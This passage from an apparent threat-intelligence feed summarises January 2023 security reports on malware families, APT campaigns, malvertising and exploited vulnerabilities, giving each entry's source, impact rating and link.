- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- During the month of December, the Huntress team has caught the talks surrounding supposed ConnectWise Control vulnerabilities and possibly in-the-wild exploitation. The Huntress team has been in contact with both the ConnectWise CISO and security team and did their own research on it and explained their opinions in the details.
Source:
https://www.huntress.com/blog/clearing-the-air-overblown-claims-of-vulnerabilities-exploits-severity
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Remcos_RAT
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Remcos RAT. It is operating since 2016. This RAT was originally promoted as genuine software for remote control of Microsoft Windows from XP onwards, and is frequently found in phishing attempts due to its capacity to completely infect an afflicted machine.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-remcos-rat-active-iocs-86
—
- Intel Source:
- Rapid 7
- Intel Name:
- Critical_ManageEngine_Vulnerability_Observed
- Date of Scan:
- 2023-01-26
- Impact:
- MEDIUM
- Summary:
- Rapid7 is taking precausios steps from the vulnerability exploitation of CVE-2022-47966. Several of the affected products are extremely popular with organizations and attackers, including ADSelfService Plus and ServiceDesk Plus. Rapid7 provided a detailed analysis of CVE-2022-47966 in AttackerKB. Rapid7 vulnerability research team discovered during testing that some products may be more exploitable than others: ServiceDesk Plus and ADSelfService.
—
- Intel Source:
- Bitdefender
- Intel Name:
- Hackers_Leveraging_ProxyNotShell_For_Attacks
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- BitDefender researchers have started observing an increase in attacks using ProxyNotShell/OWASSRF exploits chains to target on-premises Microsoft Exchange deployments.
Source:
https://businessinsights.bitdefender.com/technical-advisory-proxyhell-exploit-chains-in-the-wild
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Ursnif_Banking_Trojan_aka_Gozi
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Ursnif Banking Trojan aka Gozi. It is also known as Gozi and Dreambot has been around for more than 10 years. It gained popularity in 2015 when its source code was published on Github and since then the moderators have always tweaked some changes to make use of their arsenal according to their gains.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Vice_Society_Ransomware_Group_Targeting_Manufacturing_Companies
- Date of Scan:
- 2023-01-26
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have highlighted the findings of Vice Society, which includes an end-to-end infection diagram.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Hackers_From_DragonSpark_Using_Golang_Malware_to_Avoid_Detection
- Date of Scan:
- 2023-01-26
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelOne have identified that companies in East Asia are being targeted by a Chinese-speaking threat actor named DragonSpark. The attacks are characterized by the use of the little-known open-source SparkRAT and malware that attempts to evade detection through Golang source code interpretation.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_APT_Group_Gamaredon
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of APT Group Gamaredon. It is a Russia-backed advanced persistent threat (APT) that has been operating since at least 2013. The group is believed to be operating out of Ukraine, and is thought to be focused on targeting Ukrainian government and military organizations, as well as individuals and organizations in the energy sector.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-apt-group-gamaredon-active-iocs-31
—
- Intel Source:
- Blackberry
- Intel Name:
- New_Evasion_Methods_For_Emotet
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- BlackBerry researchers have observed that Emotet returns with new techniques. It is continued to steadily evolve, adding new techniques for evasion and increasing its likelihood of successful infections. It is also able to host an array of modules, each used for different aspects of information theft that report back to their command-and-control (C2) servers.
Source:
https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion
—
- Intel Source:
- SocInvestigation
- Intel Name:
- Cybercriminals_Using_JQuery_to_Spread_Malware
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Researchers from SocInvestigation have identified that the popular javascript library “JQuery” is used by hackers for distributing malware.
Source:
https://www.socinvestigation.com/malicious-jquery-javascript-threat-detection-incident-response/
—
- Intel Source:
- Confiant
- Intel Name:
- Black_Friday_Day_Makes_Big_For_Malvertising
- Date of Scan:
- 2023-01-25
- Impact:
- LOW
- Summary:
- Confiant researchers have observed a cookie-stuffing campaign running across multiple programmatic ad platforms with a specific uptick in Q4 around Black Friday.
Source:
https://blog.confiant.com/malvertiser-makes-the-big-bucks-on-black-friday-637922cd5865
—
- Intel Source:
- Uptycs
- Intel Name:
- Titan_Stealer_Malware_Distributing_via_Telegram_Channel
- Date of Scan:
- 2023-01-25
- Impact:
- LOW
- Summary:
- Researchers from Uptycs have discovered a campaign involving the Titan Stealer malware, which is being marketed and sold by a threat actor (TA) through a Telegram channel for cybercrime purposes.
Source:
https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign
—
- Intel Source:
- Esentire
- Intel Name:
- A_Deep_Examination_of_Raspberry_Robin
- Date of Scan:
- 2023-01-25
- Impact:
- LOW
- Summary:
- Esentire researchers have observed 11 cases of Raspberry Robin infections since May 2022 and analyzed them.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-raspberry-robin
—
- Intel Source:
- Cyfirma
- Intel Name:
- Remcos_RAT_Deployment_by_GuLoader
- Date of Scan:
- 2023-01-24
- Impact:
- LOW
- Summary:
- CYFIRMA researchers have identified the distribution of a malicious PDF file through email. It redirects the user to a cloud-based platform where they are prompted to download a ZIP file.
Source:
https://www.cyfirma.com/outofband/guloader-deploying-remcos-rat/
—
- Intel Source:
- Human Blog
- Intel Name:
- Advertisement_Fraud_Scheme_VASTFLUX_Targeted_Over_11_Million_Devices
- Date of Scan:
- 2023-01-24
- Impact:
- LOW
- Summary:
- Researchers from HUMAN’s Satori Threat Intelligence team have identified a sophisticated ad fraud scheme, dubbed VASTFLUX, that targeted more than 11 million devices.
Source:
https://www.humansecurity.com/learn/blog/traffic-signals-the-vastflux-takedown
—
- Intel Source:
- Radware
- Intel Name:
- 8220_Gang_Targeting_Vulnerable_Cloud_Providers
- Date of Scan:
- 2023-01-24
- Impact:
- LOW
- Summary:
- Radware researchers have identified that the Chinese threat group a.k.a 8220 Gang is targeting cloud providers and poorly secured applications with a custom-built crypto miner and IRC bot.
—
- Intel Source:
- Analyst1
- Intel Name:
- Diving_Deep_into_LockBit_Ransomware
- Date of Scan:
- 2023-01-23
- Impact:
- MEDIUM
- Summary:
- Researchers from Analyst1 have analyzed the LockBit ransomware operations. It is one of the most notorious organized cybercrime syndicates that exists today.
—
- Intel Source:
- Sucuri
- Intel Name:
- Database_Infections_That_Compromise_Vulnerable_WordPress_Sites
- Date of Scan:
- 2023-01-20
- Impact:
- LOW
- Summary:
- Sucuri researchers have identified a database injection that has two different pieces of malware accomplishing two unrelated goals. The first injection redirects users to a spammy sports website and the second injection boosts authority of a spammy casino website within search engines.
—
- Intel Source:
- Fortinet
- Intel Name:
- New_CrySIS_or_Dharma_Ransomware_Variants
- Date of Scan:
- 2023-01-20
- Impact:
- MEDIUM
- Summary:
- Fortinet Labs researchers have analyzed the variants of the CrySIS/Dharma ransomware family.
—
- Intel Source:
- Mandiant
- Intel Name:
- Fortinet_Firewall_Vulnerability_Exploited_by_New_Chinese_Malware
- Date of Scan:
- 2023-01-20
- Impact:
- MEDIUM
- Summary:
- Researchers from Mandiant have identified a China-nexus threat actor who exploited a recently patched vulnerability in Fortinet FortiOS SSL-VPN as a zero-day in attacks targeting a European government entity and a managed service provider (MSP) located in Africa.
Source:
https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw
—
- Intel Source:
- Team Cymru
- Intel Name:
- The_Vidar_operators_expanding_their_infrastructure
- Date of Scan:
- 2023-01-20
- Impact:
- MEDIUM
- Summary:
- Team Cymru researchers analyzed on Darth Vidar infrastructure. Vidar operators appear to be expanding their infrastructure. Vidar is an info-stealer malware, which was first spotted in the wild in late 2018 by the security researcher Fumik0. The name itself (Vidar) is derived from a string found in the malware’s code. Vidar is considered to be a distinct fork of the Arkei malware family.
Source:
https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure
—
- Intel Source:
- Mandiant
- Intel Name:
- Exploitation_of_FortiOS_Vulnerability_CVE_2022_42475
- Date of Scan:
- 2023-01-20
- Impact:
- HIGH
- Summary:
- Mandiant is monitoring a suspected China-nexus campaign that exploited a recently discovered vulnerability in Fortinet’s FortiOS SSL-VPN, CVE-2022-42475, as a zero-day. Mandiant discovered a new malware called “BOLDMOVE” during the investigation. They found a Windows variant of BOLDMOVE and a Linux variant, which is specifically designed to run on FortiGate Firewalls.
Source:
https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_samples_January_9_15th_2023
- Date of Scan:
- 2023-01-20
- Impact:
- LOW
- Summary:
- The ASEC analysis team keep monitoring weekly malware collection samples for January 9-15th, 2023. The top malwares for this week is SmokeLoader, BeamWinHTTP, Formbook, AgentTesla and Lokibot.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Batloader_Malware_Attacks_in_Q4_2022_Used_Obfuscated_JavaScript_Files_and_Legitimate_Tools
- Date of Scan:
- 2023-01-19
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have identified notable Batloader campaigns that they observed in the last quarter of 2022, including the abuse of custom action scripts from the Advanced Installer software and Windows Installer XML (WiX) toolset, the use of obfuscated JavaScript files as a first-stage payload, and the use of PyArmor tool to obfuscate Batloader Python scripts.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_STRRAT_Malware
- Date of Scan:
- 2023-01-19
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of STRRAT Malware. It is a Java-based Remote-Access Trojan (RAT) with a slew of malicious features, notably information theft and backdoor capabilities.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-strrat-malware-active-iocs-7
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Cybersecurity_incident_on_website_of_Liquor_Control_Board_of_Ontario
- Date of Scan:
- 2023-01-19
- Impact:
- LOW
- Summary:
- This month, the Liquor Control Board of Ontario (LCBO) shared the news about a cybersecurity incident, affecting online sales. The cybersecurity incident was a web skimmer, which is designed to retrieve customer payment information.
—
- Intel Source:
- Sentilone
- Intel Name:
- The_SEO_Poisoning_attack
- Date of Scan:
- 2023-01-19
- Impact:
- LOW
- Summary:
- A lot of researchers have observed increase in malicious search engine advertisements found in the wild – known as SEO Poisoning, which is malvertising (malicious advertising) activity. There is an increasing variety in the specifics of the malware delivery method, such as which searches produce the malicious advertisements and which malware being delivered.
—
- Intel Source:
- Talos
- Intel Name:
- The_LNK_metadata_trail
- Date of Scan:
- 2023-01-19
- Impact:
- LOW
- Summary:
- Cisco Talos reserachers analyzed metadata in LNK files that lined to threat actors tactics techniques and procedures, to identify their activity. The researchers report shares their analyses on Qakbot and Gamaredon as examples.
Source:
https://blog.talosintelligence.com/following-the-lnk-metadata-trail/
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Gh0st_RAT
- Date of Scan:
- 2023-01-19
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Gh0st RAT. It is a remote access trojan that allows an attacker to access an infected machine to harvest sensitive information and data. This type of malware enables cybercriminals to gain complete access to infected computers and attempt to hijack the user’s banking account.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-gh0st-rat-active-iocs-4
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_NJRAT
- Date of Scan:
- 2023-01-18
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of NJRAT. It is a Remote Access Trojan, which is found leveraging Pastebin to deliver a second-stage payload after initial infection.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-njrat-active-iocs-49
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malicious_Google_Ads
- Date of Scan:
- 2023-01-18
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified that Google ads are a common vector for malware distribution. These ads frequently lead to fake sites impersonating web pages for legitimate software.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Attacks_on_Iranian_Government_Entities_Through_Backdoor_Diplomacy
- Date of Scan:
- 2023-01-18
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have identified that the threat actor known as Backdoor Diplomacy has been linked to a new wave of attacks targeting Iranian government entities between July and late December 2022.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Abusing_Google_Ads_platform_by_various_campaigns
- Date of Scan:
- 2023-01-18
- Impact:
- LOW
- Summary:
- CYFIRMA researchers observed the campaigns closely and they provided preliminary analysis of a new RAT known as “VagusRAT” and its possible attribution to Iranian Threat actors. The VagusRAT is also delivered to the victims by exploiting Google Ads.
Source:
https://www.cyfirma.com/outofband/vagusrat-a-new-entrant-in-the-external-threat-landscape/
—
- Intel Source:
- Sentilone
- Intel Name:
- The_observation_of_the_numerous_attacks_by_NetSupport_RAT_campaign
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- Researchers from ASEC reported on a NetSupport RAT campaign that uses a Pokemon as the social engineering lure. Threat actors is hosting a Pokemon-based NFT gameat the malicious sites offering both a fun and financially rewards.
—
- Intel Source:
- Perception-Point
- Intel Name:
- Exploitation_by_attackers_to_deliver_malware_with_Microsoft_Office_macros
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- The Perception-Point researchers discussed in their blog on similarity of Microsoft Office macros, which are widely exploited by attackers and used to delivering malware. They discussed the tactics of similarity based on real-world samples that was detected in the wild.
Source:
https://perception-point.io/blog/malicious-office-macros-detecting-similarity-in-the-wild-2/
—
- Intel Source:
- ASEC
- Intel Name:
- Document_Type_Malware_Targeting_Security_Field_Workers
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- ASEC researchers have observed document-type malware distributing and targeting workers in the security field. The obtained malware uses an external object within a Word document to execute an additional malicious macro.
—
- Intel Source:
- Sekoia
- Intel Name:
- Other_Threat_Actor_Can_Use_Raspberry_Robin
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- Sekoia researchers have identified that Raspberry Robin’s attack infrastructure, that possible for other threat actors to repurpose the infections for their own malicious activities which makes it an even more potent threat.
Source:
https://blog.sekoia.io/raspberry-robins-botnet-second-life/
—
- Intel Source:
- CircleCI
- Intel Name:
- A_Deep_Analysis_of_CircleCI_Security_Alert
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- Researchers from CircleCI have received an alert and analyzed the suspicious GitHub OAuth activity.
Source:
https://circleci.com/blog/jan-4-2023-incident-report/
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Bitter_APT_Group
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- The Rewterz analysts team did an analysis summary on Bitter APT Group. APT-17 group aka BITTER APT group has been recently active and targeting sectors in South Asia for information theft and espionage. This group has a history of targeting Energy, Engineering, and Government in South Asia.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-bitter-apt-group-active-iocs-22
—
- Intel Source:
- Avast
- Intel Name:
- Decryption_Tool_For_BianLian_Ransomware_Released_by_Avast
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- Avast researchers have released a free decryptor for the BianLian ransomware strain to help victims of the malware recover locked files without paying the hackers.
Source:
https://decoded.avast.io/threatresearch/decrypted-bianlian-ransomware/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Hackers_Using_Middle_Eastern_Geopolitical_Themed_to_Distribute_NjRAT
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have identified an active campaign that is using Middle Eastern geopolitical themes as a lure to target potential victims in the Middle East and Africa. In this campaign, Earth Bogle, the threat actor uses public cloud storage services such as files.fm and failiem.lv to host malware, while compromised web servers distribute NjRAT.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_Threats_analyses_January_1_7_2023
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- The ASEC analysis team keep monitoring phishing email threats with their automatic sample analysis system (RAPIT) and honeypot. Their post explained the samples of distribution of phishing emails during the week from January 1st, 2023 to January 7th, 2022. The most prevalent threat type was observed in phishing email attachments was FakePage, taking up 58%. FakePages are web pages where the threat actor has duplicated the screen layout, logo, and font of the real login pages or advertising pages, leading users to enter their account and password information.
—
- Intel Source:
- Fortinet
- Intel Name:
- Three_PyPI_Package_Spreading_Malware_to_Developer_Systems
- Date of Scan:
- 2023-01-17
- Impact:
- MEDIUM
- Summary:
- Fortinet researchers have identified that a threat actor named Lolip0p has uploaded three rogue packages to the Python Package Index (PyPI) repository that is designed to drop malware on compromised developer systems.
—
- Intel Source:
- ASEC
- Intel Name:
- A_manuscript_Solicitation_Letter_was_disguised_by_malware
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- On January 8th, the ASEC analysis team discovered a document-type malware targeting workers in the security field. The obtained malware uses an external object within a Word document to execute an additional malicious macro.
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Email_Targeting_National_Tax_Service
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered that a phishing email impersonating the National Tax Service is distributing.
—
- Intel Source:
- Crep1x
- Intel Name:
- Vidar_Stealer_Attack_Campaign_impersonating_AnyDesk
- Date of Scan:
- 2023-01-15
- Impact:
- LOW
- Summary:
- Typosquatting attack campaign found in the wild impersonating multiple legitimate RMM tools and redirecting users to fake AnyDesk websites triggering Vidar Stealer Payload download through dropbox.
Source:
https://twitter.com/crep1x/status/1612199364805660673
—
- Intel Source:
- Cyble
- Intel Name:
- Rhadamanthys_Stealer_Leverages_Google_Ads_in_the_wild
- Date of Scan:
- 2023-01-14
- Impact:
- LOW
- Summary:
- Researchers from Cyble found a new malware strain, Rhadamanthys Stealer, leveraging Spam and Phishing campaigns through Google Ads and redirecting users to fake phishing websites of popular software. The Malware downloaded in the background of legitimate files or through obfuscated images steals sensitive information to further aid in unauthorized access.
Source:
https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/
—
- Intel Source:
- PaloAlto
- Intel Name:
- PurpleUrchin_Campaign_Bypass_CAPTCHA_and_Steals_Cloud_Platform_Resources
- Date of Scan:
- 2023-01-14
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto have analyzed Automated Libra, the cloud threat actor group behind the freejacking campaign PurpleUrchin. Automated Libra is a South African-based freejacking group that primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their cryptomining operations.
Source:
https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/
—
- Intel Source:
- Esentire
- Intel Name:
- Gootloader_Malware_returns_with_revamped_infection_technique
- Date of Scan:
- 2023-01-14
- Impact:
- LOW
- Summary:
- Researchers from Esentire found Gootloader malware activity with a new infection technique, further leading to Cobalt Strike leveraging existing PowerShell process beaconed to various malicious domains. The attacker seems to be hands-on, dropping multiple payloads, including BloodHound and PsExec, while being persistent and targeting different areas for further compromise.
Source:
https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity
—
- Intel Source:
- Wordfence
- Intel Name:
- Spike_in_Holiday_Attacks_Targeting_Ancient_Vulnerabilities_and_Hidden_Webshells
- Date of Scan:
- 2023-01-13
- Impact:
- LOW
- Summary:
- Researchers from Wordfence have observed spikes in attack traffic over the Christmas and New Year holidays, which is specifically targeting the Downloads Manager plugin by Giulio Ganci.
—
- Intel Source:
- ASEC
- Intel Name:
- Orcus_RAT_being_distributed_on_file_sharing_sites
- Date of Scan:
- 2023-01-13
- Impact:
- LOW
- Summary:
- The ASEC analysis team recently identified Orcus RAT being distributed on file-sharing sites disguised as a cracked version of Hangul Word Processor.
—
- Intel Source:
- Deep Instinct
- Intel Name:
- RAT_Malware_Campaign_Using_Polyglot_Files_to_Evade_Detection
- Date of Scan:
- 2023-01-13
- Impact:
- LOW
- Summary:
- Deep Instinct researchers have identified that operators of the StrRAT and Ratty remote access trojans (RAT) are running a new campaign using polyglot MSI/JAR and CAB/JAR files to evade detection from security tools.
Source:
https://www.deepinstinct.com/blog/malicious-jars-and-polyglot-files-who-do-you-think-you-jar
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Unpatched_Vulnerability_to_Bypass_Windows_OS_Security_Feature
- Date of Scan:
- 2023-01-13
- Impact:
- MEDIUM
- Summary:
- EclecticIQ analysts researched on QakBot phishing campaigns who can turn it to a Zero-Day Vulnerability to evade Windows Mark of the Web (MoTW). QakBot may be able to increase its infection success rate as a result of the switch to a zero-day exploit.
—
- Intel Source:
- Rapid7
- Intel Name:
- Research_on_HIVE_Ransomware_attacks
- Date of Scan:
- 2023-01-13
- Impact:
- MEDIUM
- Summary:
- Rapid7 monitors and research on the range of techniques that threat actors use to conduct malicious activity. Recently, Rapid7 observed a malicious activity performed by threat actor performing several known techniques for distributing ransomware across many systems within a victim’s environment. In addition to those techniques, the actor employed a number of previously unseen techniques designed to to drop the defenses of the victim, inhibit monitoring, disable networking and allow time for the ransomware to finish encrypting files.
Source:
https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Deep_Investigation_of_FortiOS_Zero_Day_Attack
- Date of Scan:
- 2023-01-13
- Impact:
- LOW
- Summary:
- Researchers from Fortinet have analyzed the zero-day vulnerability in FortiOS SSL-VPN that Fortinet addressed last month was exploited by unknown actors in attacks targeting the government and other large organizations.
—
- Intel Source:
- Bitdefender
- Intel Name:
- A_Deep_Dive_into_EyeSpy_Spyware
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- Researchers from Bitdefender have analyzed spyware named EyeSpy which is marketed as a legitimate monitoring application that arrives on the system via Trojanized installers and it is targeting t Iranian users trying to download VPN solutions to bypass Internet restrictions in their country.
—
- Intel Source:
- Avast
- Intel Name:
- The_Examine_of_NeedleDropper_Malware
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- Avast researchers have analyzed the NeedleDropper malware and it is a self-extracting archive that contains a modified AutoIt interpreter, obfuscated AutoIt script, and Visual Basic script, which is used for initial execution.
Source:
https://decoded.avast.io/threatresearch/needledropper/
—
- Intel Source:
- Fortinet
- Intel Name:
- Ransomware_variants_across_the_OSINT_community
- Date of Scan:
- 2023-01-12
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs monitors and gathers data on ransomware variants weekly that have been catching on in their datasets and across the OSINT community. They shared their ransomware report provides the insights into the ransomware landscape and the Fortinet solutions that protect against those variants.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-monti-blackhunt-and-more
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_sample_analyses_Dec_24_31_2022
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- The ASEC analysis team keep monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from December 24th, 2022 to December 31st, 2022 and provide statistical information on each type.
—
- Intel Source:
- Group-IB
- Intel Name:
- Dark_Pink_APT_Group_Targeting_Asia_Pacific_Region
- Date of Scan:
- 2023-01-12
- Impact:
- MEDIUM
- Summary:
- Group-IB researchers have identified a new wave of attacks that have struck the Asia-Pacific (APAC) region by the Dark Pink APT group.
—
- Intel Source:
- SentinelOne
- Intel Name:
- NoName057_16_Hacking_Group_Targeting_NATO
- Date of Scan:
- 2023-01-12
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelOne have observed that the Pro-Russian hacking group named NoName057(16) targeting Czech presidential election candidates’ websites.
Source:
https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Hackers_From_Scattered_Spider_Using_Old_Intel_Driver_to_Bypass_Security
- Date of Scan:
- 2023-01-12
- Impact:
- MEDIUM
- Summary:
- CrowdStrick researchers have identified a financially motivated threat actor named Scattered Spider and observed attempting to deploy Intel Ethernet diagnostics drivers in a BYOVD (Bring Your Own Vulnerable Driver) attack to evade detection from EDR (Endpoint Detection and Response) security products.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Gootkit_Loader_Campaign_Targeting_Australian_Healthcare_Industry
- Date of Scan:
- 2023-01-12
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro have analyzed a series of attacks and discovered that Gootkit leveraging SEO poisoning for its initial access and abusing legitimate tools like VLC Media Player.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Mirai_Botnet_aka_Katana
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Mirai Botnet aka Katana. Mirai is one of the first major botnets to target Linux-based vulnerable networking devices. It was discovered in August 2016 and its name means “future” in Japanese.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-mirai-botnet-aka-katana-active-iocs-4
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_DanaBot_Trojan
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of DanaBot Trojan. DanaBot is a persistent and ever-evolving threat that has been circulating in the wild since 2018 and it was originally marketed as a Malware-as-a-Service (MaaS) offering primarily targeted banking fraud and data theft.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-danabot-trojan-active-iocs-45
—
- Intel Source:
- Cybereason
- Intel Name:
- Diving_Deep_into_IcedID_Malware
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- Cybereason researchers have analyzed IcedID infection that illustrates the tactics, techniques, and procedures (TTPs) used in a recent campaign. It is also known as BokBot, which is traditionally known as a banking trojan used to steal financial information from its victims.
Source:
https://www.cybereason.com/blog/threat-analysis-from-icedid-to-domain-compromise
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_sample_analyses
- Date of Scan:
- 2023-01-12
- Impact:
- LOW
- Summary:
- The ASEC analysis team keep monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from December 18th, 2022 to December 24th, 2022 and provide statistical information on each type.
—
- Intel Source:
- Phylum
- Intel Name:
- A_Novel_Info_Stealer_RAT_leveraging_PYPI
- Date of Scan:
- 2023-01-11
- Impact:
- LOW
- Summary:
- Phylum researchers have identified a novel malware campaign targeting the Python Package Index (PyPI), a combination of RAT and Stealer, to exfiltrate various data while being persistent and opening tunnels. The RAT being spread has Web GUI projecting the continuous focus on supply chain attacks.
Source:
https://blog.phylum.io/a-deep-dive-into-powerat-a-newly-discovered-stealer/rat-combo-polluting-pypi
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Magecart_Skimmer_Using_MRSNIFFA_Toolkit
- Date of Scan:
- 2023-01-11
- Impact:
- LOW
- Summary:
- Malwarebytes Labs researchers have identified a Magecart skimmer using the mr.SNIFFA toolkit and infrastructure from DDoS-Guard. The domain names used to serve the skimmer referenced public figures or names well-known in the cryptocurrency world.
—
- Intel Source:
- Intrinsec
- Intel Name:
- Emotet_Malware_resurfaces_deploying_loaders_through_Spear_Phishing
- Date of Scan:
- 2023-01-11
- Impact:
- MEDIUM
- Summary:
- Researchers from Intrinsic uncovered Emotet’s latest Spam campaign spreading malicious documents in the wild, in addition to targeted spear-phishing emails. The malware returns with new obfuscation techniques and revamped loader capabilities.
Source:
https://www.intrinsec.com/emotet-returns-and-deploys-loaders/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Dridex_Malware_Returns_and_Targeting_MacOS
- Date of Scan:
- 2023-01-11
- Impact:
- LOW
- Summary:
- TrendMicro researchers have analyzed Dridex, an online banking malware variant targeting MacOS platforms with a new technique to deliver documents embedded with malicious macros to users.
Source:
https://www.trendmicro.com/en_us/research/23/a/-dridex-targets-macos-using-new-entry-method.html
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/-dridex-returns
-targets-macos-using-new-entry-method/iocs-dridex-returns-targets-macos-using-new-entry-method.txt
—
- Intel Source:
- Cyble
- Intel Name:
- LummaC2_Stealer_Targeting_Chromium_and_Mozilla_Based_Browsers
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a post on the cybercrime forum about an information stealer named LummaC2 Stealer targeting both Chromium and Mozilla-based browsers.
Source:
https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/
—
- Intel Source:
- Mandient
- Intel Name:
- Russian_Turla_Cyberspies_via_USB_Delivered_Malware
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- Recently Russian state-sponsored threat actor Turla lunched attackes against Ukraine and it was leveraged by Andromeda malware most likely deployed by other hackers via an infected USB drive, Mandiant reported. Mandiant researchers analyzed a Turla-suspected operation tUNC4210 and discovered that at least three expired Andromeda command and control (C&C) domains have been reregistered and used for victim profiling.
Source:
https://www.mandiant.com/resources/blog/turla-galaxy-opportunity
—
- Intel Source:
- Uptycs
- Intel Name:
- InfoStealer_Targeting_Italian_Region
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- Researchers from Uptycs have observed a new infostealer malware attack campaign. In that the threat actors delivered emails through spam or phishing mail with the subject as “Invoice”, targeting the specific geo of Italy.
Source:
https://www.uptycs.com/blog/infostealer-malware-attacks-targeting-italian-region/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- DShield_Sensor_JSON_Log_Analysis
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed json DShield logs for a 9-day period.
—
- Intel Source:
- 360Netlab
- Intel Name:
